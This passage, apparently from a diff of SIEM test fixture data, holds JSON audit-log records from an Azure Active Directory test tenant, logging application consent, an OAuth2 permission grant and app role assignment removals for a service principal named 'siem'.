{"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Remove app role assignment from service principal.", "Id": "227bc85c-0c21-4df3-9e11-3a24f104e1e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:17:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "2f79971d-1802-40d2-b048-6cf4f85c010b"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:17:45.3474390Z"}, {"Name": "env_epoch", "Value": "95CEL"}, {"Name": "env_seqNum", "Value": "44735126"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR519"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add a deletion-marked app role assignment grant to service principal as part of link removal.", "Id": "a385881d-d5e8-47b0-83ea-d50d6c9906e4"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"NewValue": "True", "OldValue": "", "Name": "ConsentContext.OnBehalfOfAll"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3393756Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118027"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "0031778a-80cf-49f8-aea2-f798c9bf1ec9"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
